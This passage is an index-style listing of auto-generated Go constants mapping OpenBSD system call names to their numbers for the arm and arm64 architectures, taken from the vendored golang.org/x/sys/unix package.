SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 114) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 115) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 116) | SYS_PPOLL = 109 constant SYS_PSELECT (line 117) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 118) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 119) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 120) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 121) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 122) | SYS_THRKILL = 119 constant SYS_READV (line 123) | SYS_READV = 120 constant SYS_WRITEV (line 124) | SYS_WRITEV = 121 constant SYS_KILL (line 125) | SYS_KILL = 122 constant SYS_FCHOWN (line 126) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 127) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 128) | SYS_SETREUID = 126 constant SYS_SETREGID (line 129) | SYS_SETREGID = 127 constant SYS_RENAME (line 130) | SYS_RENAME = 128 constant SYS_FLOCK (line 131) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 132) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 133) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 134) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 135) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 136) | SYS_MKDIR = 136 constant SYS_RMDIR (line 137) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 138) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 139) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 140) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 141) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 142) | SYS_NFSSVC = 155 constant SYS_GETFH (line 143) | SYS_GETFH = 161 constant SYS_SYSARCH (line 144) | SYS_SYSARCH = 165 constant SYS_PREAD (line 145) | SYS_PREAD = 173 constant SYS_PWRITE (line 146) | SYS_PWRITE = 174 constant SYS_SETGID (line 147) | SYS_SETGID = 181 constant SYS_SETEGID (line 148) | SYS_SETEGID = 182 constant SYS_SETEUID (line 149) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 150) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 151) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 152) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 153) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 154) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 155) | SYS_MMAP = 197 constant SYS_LSEEK (line 156) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 157) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 158) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 159) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 160) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 161) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 162) | SYS_GETPGID = 207 constant SYS_UTRACE (line 163) | SYS_UTRACE = 209 constant SYS_SEMGET (line 164) | SYS_SEMGET = 221 constant SYS_MSGGET (line 165) | SYS_MSGGET = 225 constant SYS_MSGSND (line 166) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 167) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 168) | SYS_SHMAT = 228 constant SYS_SHMDT (line 169) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 170) | SYS_MINHERIT = 250 constant SYS_POLL (line 171) | SYS_POLL = 252 constant SYS_ISSETUGID (line 172) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 173) | SYS_LCHOWN = 254 constant SYS_GETSID (line 174) | SYS_GETSID = 255 constant SYS_MSYNC (line 175) | SYS_MSYNC = 256 constant SYS_PIPE (line 176) | SYS_PIPE = 263 constant SYS_FHOPEN (line 177) | SYS_FHOPEN = 264 constant SYS_PREADV (line 178) | SYS_PREADV = 267 constant SYS_PWRITEV (line 179) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 180) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 181) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 182) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 183) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 184) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 185) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 186) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 187) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 188) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 189) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 190) | SYS_SHMGET = 289 constant SYS_SEMOP (line 191) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 192) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 193) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 194) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 195) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 196) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 197) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 198) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 199) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 200) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 201) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 202) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 203) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 204) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 205) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 206) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 207) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 208) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 209) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 210) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 211) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 212) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 213) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 214) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 215) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 216) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 217) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 218) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_arm.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_STAT (line 46) | SYS_STAT = 38 constant SYS_GETPPID (line 47) | SYS_GETPPID = 39 constant SYS_LSTAT (line 48) | SYS_LSTAT = 40 constant SYS_DUP (line 49) | SYS_DUP = 41 constant SYS_FSTATAT (line 50) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 51) | SYS_GETEGID = 43 constant SYS_PROFIL (line 52) | SYS_PROFIL = 44 constant SYS_KTRACE (line 53) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 54) | SYS_SIGACTION = 46 constant SYS_GETGID (line 55) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 56) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 57) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 58) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 59) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 60) | SYS_FSTAT = 53 constant SYS_IOCTL (line 61) | SYS_IOCTL = 54 constant SYS_REBOOT (line 62) | SYS_REBOOT = 55 constant SYS_REVOKE (line 63) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 64) | SYS_SYMLINK = 57 constant SYS_READLINK (line 65) | SYS_READLINK = 58 constant SYS_EXECVE (line 66) | SYS_EXECVE = 59 constant SYS_UMASK (line 67) | SYS_UMASK = 60 constant SYS_CHROOT (line 68) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 69) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 70) | SYS_STATFS = 63 constant SYS_FSTATFS (line 71) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 72) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 73) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 74) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 75) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 76) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 70 constant SYS_SELECT (line 78) | SYS_SELECT = 71 constant SYS_KEVENT (line 79) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 80) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 81) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 82) | SYS_MADVISE = 75 constant SYS_UTIMES (line 83) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 84) | SYS_FUTIMES = 77 constant SYS_MINCORE (line 85) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 86) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 87) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 88) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 89) | SYS_SETPGID = 82 constant SYS_FUTEX (line 90) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 91) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 92) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 93) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 94) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 95) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 96) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 97) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 98) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 99) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 100) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 101) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 102) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 103) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 104) | SYS_SOCKET = 97 constant SYS_CONNECT (line 105) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 106) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 107) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 108) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 109) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 110) | SYS_SIGRETURN = 103 constant SYS_BIND (line 111) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 112) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 113) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 114) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 115) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 116) | SYS_PPOLL = 109 constant SYS_PSELECT (line 117) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 118) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 119) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 120) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 121) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 122) | SYS_THRKILL = 119 constant SYS_READV (line 123) | SYS_READV = 120 constant SYS_WRITEV (line 124) | SYS_WRITEV = 121 constant SYS_KILL (line 125) | SYS_KILL = 122 constant SYS_FCHOWN (line 126) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 127) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 128) | SYS_SETREUID = 126 constant SYS_SETREGID (line 129) | SYS_SETREGID = 127 constant SYS_RENAME (line 130) | SYS_RENAME = 128 constant SYS_FLOCK (line 131) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 132) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 133) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 134) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 135) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 136) | SYS_MKDIR = 136 constant SYS_RMDIR (line 137) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 138) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 139) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 140) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 141) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 142) | SYS_NFSSVC = 155 constant SYS_GETFH (line 143) | SYS_GETFH = 161 constant SYS_SYSARCH (line 144) | SYS_SYSARCH = 165 constant SYS_PREAD (line 145) | SYS_PREAD = 173 constant SYS_PWRITE (line 146) | SYS_PWRITE = 174 constant SYS_SETGID (line 147) | SYS_SETGID = 181 constant SYS_SETEGID (line 148) | SYS_SETEGID = 182 constant SYS_SETEUID (line 149) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 150) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 151) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 152) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 153) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 154) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 155) | SYS_MMAP = 197 constant SYS_LSEEK (line 156) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 157) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 158) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 159) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 160) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 161) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 162) | SYS_GETPGID = 207 constant SYS_UTRACE (line 163) | SYS_UTRACE = 209 constant SYS_SEMGET (line 164) | SYS_SEMGET = 221 constant SYS_MSGGET (line 165) | SYS_MSGGET = 225 constant SYS_MSGSND (line 166) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 167) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 168) | SYS_SHMAT = 228 constant SYS_SHMDT (line 169) | SYS_SHMDT = 230 constant SYS_MINHERIT (line 170) | SYS_MINHERIT = 250 constant SYS_POLL (line 171) | SYS_POLL = 252 constant SYS_ISSETUGID (line 172) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 173) | SYS_LCHOWN = 254 constant SYS_GETSID (line 174) | SYS_GETSID = 255 constant SYS_MSYNC (line 175) | SYS_MSYNC = 256 constant SYS_PIPE (line 176) | SYS_PIPE = 263 constant SYS_FHOPEN (line 177) | SYS_FHOPEN = 264 constant SYS_PREADV (line 178) | SYS_PREADV = 267 constant SYS_PWRITEV (line 179) | SYS_PWRITEV = 268 constant SYS_KQUEUE (line 180) | SYS_KQUEUE = 269 constant SYS_MLOCKALL (line 181) | SYS_MLOCKALL = 271 constant SYS_MUNLOCKALL (line 182) | SYS_MUNLOCKALL = 272 constant SYS_GETRESUID (line 183) | SYS_GETRESUID = 281 constant SYS_SETRESUID (line 184) | SYS_SETRESUID = 282 constant SYS_GETRESGID (line 185) | SYS_GETRESGID = 283 constant SYS_SETRESGID (line 186) | SYS_SETRESGID = 284 constant SYS_MQUERY (line 187) | SYS_MQUERY = 286 constant SYS_CLOSEFROM (line 188) | SYS_CLOSEFROM = 287 constant SYS_SIGALTSTACK (line 189) | SYS_SIGALTSTACK = 288 constant SYS_SHMGET (line 190) | SYS_SHMGET = 289 constant SYS_SEMOP (line 191) | SYS_SEMOP = 290 constant SYS_FHSTAT (line 192) | SYS_FHSTAT = 294 constant SYS___SEMCTL (line 193) | SYS___SEMCTL = 295 constant SYS_SHMCTL (line 194) | SYS_SHMCTL = 296 constant SYS_MSGCTL (line 195) | SYS_MSGCTL = 297 constant SYS_SCHED_YIELD (line 196) | SYS_SCHED_YIELD = 298 constant SYS_GETTHRID (line 197) | SYS_GETTHRID = 299 constant SYS___THRWAKEUP (line 198) | SYS___THRWAKEUP = 301 constant SYS___THREXIT (line 199) | SYS___THREXIT = 302 constant SYS___THRSIGDIVERT (line 200) | SYS___THRSIGDIVERT = 303 constant SYS___GETCWD (line 201) | SYS___GETCWD = 304 constant SYS_ADJFREQ (line 202) | SYS_ADJFREQ = 305 constant SYS_SETRTABLE (line 203) | SYS_SETRTABLE = 310 constant SYS_GETRTABLE (line 204) | SYS_GETRTABLE = 311 constant SYS_FACCESSAT (line 205) | SYS_FACCESSAT = 313 constant SYS_FCHMODAT (line 206) | SYS_FCHMODAT = 314 constant SYS_FCHOWNAT (line 207) | SYS_FCHOWNAT = 315 constant SYS_LINKAT (line 208) | SYS_LINKAT = 317 constant SYS_MKDIRAT (line 209) | SYS_MKDIRAT = 318 constant SYS_MKFIFOAT (line 210) | SYS_MKFIFOAT = 319 constant SYS_MKNODAT (line 211) | SYS_MKNODAT = 320 constant SYS_OPENAT (line 212) | SYS_OPENAT = 321 constant SYS_READLINKAT (line 213) | SYS_READLINKAT = 322 constant SYS_RENAMEAT (line 214) | SYS_RENAMEAT = 323 constant SYS_SYMLINKAT (line 215) | SYS_SYMLINKAT = 324 constant SYS_UNLINKAT (line 216) | SYS_UNLINKAT = 325 constant SYS___SET_TCB (line 217) | SYS___SET_TCB = 329 constant SYS___GET_TCB (line 218) | SYS___GET_TCB = 330 FILE: vendor/golang.org/x/sys/unix/zsysnum_openbsd_arm64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_GETENTROPY (line 16) | SYS_GETENTROPY = 7 constant SYS___TFORK (line 17) | SYS___TFORK = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_WAIT4 (line 20) | SYS_WAIT4 = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 22) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_CHOWN (line 25) | SYS_CHOWN = 16 constant SYS_OBREAK (line 26) | SYS_OBREAK = 17 constant SYS_GETDTABLECOUNT (line 27) | SYS_GETDTABLECOUNT = 18 constant SYS_GETRUSAGE (line 28) | SYS_GETRUSAGE = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 31) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_GETEUID (line 34) | SYS_GETEUID = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 36) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 37) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 38) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 39) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 40) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 41) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 43) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 44) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_STAT (line 46) | SYS_STAT = 38 constant SYS_GETPPID (line 47) | SYS_GETPPID = 39 constant SYS_LSTAT (line 48) | SYS_LSTAT = 40 constant SYS_DUP (line 49) | SYS_DUP = 41 constant SYS_FSTATAT (line 50) | SYS_FSTATAT = 42 constant SYS_GETEGID (line 51) | SYS_GETEGID = 43 constant SYS_PROFIL (line 52) | SYS_PROFIL = 44 constant SYS_KTRACE (line 53) | SYS_KTRACE = 45 constant SYS_SIGACTION (line 54) | SYS_SIGACTION = 46 constant SYS_GETGID (line 55) | SYS_GETGID = 47 constant SYS_SIGPROCMASK (line 56) | SYS_SIGPROCMASK = 48 constant SYS_SETLOGIN (line 57) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 58) | SYS_ACCT = 51 constant SYS_SIGPENDING (line 59) | SYS_SIGPENDING = 52 constant SYS_FSTAT (line 60) | SYS_FSTAT = 53 constant SYS_IOCTL (line 61) | SYS_IOCTL = 54 constant SYS_REBOOT (line 62) | SYS_REBOOT = 55 constant SYS_REVOKE (line 63) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 64) | SYS_SYMLINK = 57 constant SYS_READLINK (line 65) | SYS_READLINK = 58 constant SYS_EXECVE (line 66) | SYS_EXECVE = 59 constant SYS_UMASK (line 67) | SYS_UMASK = 60 constant SYS_CHROOT (line 68) | SYS_CHROOT = 61 constant SYS_GETFSSTAT (line 69) | SYS_GETFSSTAT = 62 constant SYS_STATFS (line 70) | SYS_STATFS = 63 constant SYS_FSTATFS (line 71) | SYS_FSTATFS = 64 constant SYS_FHSTATFS (line 72) | SYS_FHSTATFS = 65 constant SYS_VFORK (line 73) | SYS_VFORK = 66 constant SYS_GETTIMEOFDAY (line 74) | SYS_GETTIMEOFDAY = 67 constant SYS_SETTIMEOFDAY (line 75) | SYS_SETTIMEOFDAY = 68 constant SYS_SETITIMER (line 76) | SYS_SETITIMER = 69 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 70 constant SYS_SELECT (line 78) | SYS_SELECT = 71 constant SYS_KEVENT (line 79) | SYS_KEVENT = 72 constant SYS_MUNMAP (line 80) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 81) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 82) | SYS_MADVISE = 75 constant SYS_UTIMES (line 83) | SYS_UTIMES = 76 constant SYS_FUTIMES (line 84) | SYS_FUTIMES = 77 constant SYS_GETGROUPS (line 85) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 86) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 87) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 88) | SYS_SETPGID = 82 constant SYS_FUTEX (line 89) | SYS_FUTEX = 83 constant SYS_UTIMENSAT (line 90) | SYS_UTIMENSAT = 84 constant SYS_FUTIMENS (line 91) | SYS_FUTIMENS = 85 constant SYS_KBIND (line 92) | SYS_KBIND = 86 constant SYS_CLOCK_GETTIME (line 93) | SYS_CLOCK_GETTIME = 87 constant SYS_CLOCK_SETTIME (line 94) | SYS_CLOCK_SETTIME = 88 constant SYS_CLOCK_GETRES (line 95) | SYS_CLOCK_GETRES = 89 constant SYS_DUP2 (line 96) | SYS_DUP2 = 90 constant SYS_NANOSLEEP (line 97) | SYS_NANOSLEEP = 91 constant SYS_FCNTL (line 98) | SYS_FCNTL = 92 constant SYS_ACCEPT4 (line 99) | SYS_ACCEPT4 = 93 constant SYS___THRSLEEP (line 100) | SYS___THRSLEEP = 94 constant SYS_FSYNC (line 101) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 102) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 103) | SYS_SOCKET = 97 constant SYS_CONNECT (line 104) | SYS_CONNECT = 98 constant SYS_GETDENTS (line 105) | SYS_GETDENTS = 99 constant SYS_GETPRIORITY (line 106) | SYS_GETPRIORITY = 100 constant SYS_PIPE2 (line 107) | SYS_PIPE2 = 101 constant SYS_DUP3 (line 108) | SYS_DUP3 = 102 constant SYS_SIGRETURN (line 109) | SYS_SIGRETURN = 103 constant SYS_BIND (line 110) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 111) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 112) | SYS_LISTEN = 106 constant SYS_CHFLAGSAT (line 113) | SYS_CHFLAGSAT = 107 constant SYS_PLEDGE (line 114) | SYS_PLEDGE = 108 constant SYS_PPOLL (line 115) | SYS_PPOLL = 109 constant SYS_PSELECT (line 116) | SYS_PSELECT = 110 constant SYS_SIGSUSPEND (line 117) | SYS_SIGSUSPEND = 111 constant SYS_SENDSYSLOG (line 118) | SYS_SENDSYSLOG = 112 constant SYS_UNVEIL (line 119) | SYS_UNVEIL = 114 constant SYS_GETSOCKOPT (line 120) | SYS_GETSOCKOPT = 118 constant SYS_THRKILL (line 121) | SYS_THRKILL = 119 constant SYS_READV (line 122) | SYS_READV = 120 constant SYS_WRITEV (line 123) | SYS_WRITEV = 121 constant SYS_KILL (line 124) | SYS_KILL = 122 constant SYS_FCHOWN (line 125) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 126) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 127) | SYS_SETREUID = 126 constant SYS_SETREGID (line 128) | SYS_SETREGID = 127 constant SYS_RENAME (line 129) | SYS_RENAME = 128 constant SYS_FLOCK (line 130) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 131) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 132) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 133) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 134) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 135) | SYS_MKDIR = 136 constant SYS_RMDIR (line 136) | SYS_RMDIR = 137 constant SYS_ADJTIME (line 137) | SYS_ADJTIME = 140 constant SYS_GETLOGIN_R (line 138) | SYS_GETLOGIN_R = 141 constant SYS_SETSID (line 139) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 148 constant SYS_NFSSVC (line 141) | SYS_NFSSVC = 155 constant SYS_GETFH (line 142) | SYS_GETFH = 161 constant SYS_SYSARCH (line 143) | SYS_SYSARCH = 165 constant SYS_PREAD (line 144) | SYS_PREAD = 173 constant SYS_PWRITE (line 145) | SYS_PWRITE = 174 constant SYS_SETGID (line 146) | SYS_SETGID = 181 constant SYS_SETEGID (line 147) | SYS_SETEGID = 182 constant SYS_SETEUID (line 148) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 149) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 150) | SYS_FPATHCONF = 192 constant SYS_SWAPCTL (line 151) | SYS_SWAPCTL = 193 constant SYS_GETRLIMIT (line 152) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 153) | SYS_SETRLIMIT = 195 constant SYS_MMAP (line 154) | SYS_MMAP = 197 constant SYS_LSEEK (line 155) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 156) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 157) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 158) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 159) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 204 constant SYS_GETPGID (line 161) | SYS_GETPGID = 207 constant SYS_UTRACE (line 162) | SYS_UTRACE = 209 constant SYS_SEMGET (line 163) | SYS_SEMGET = 221 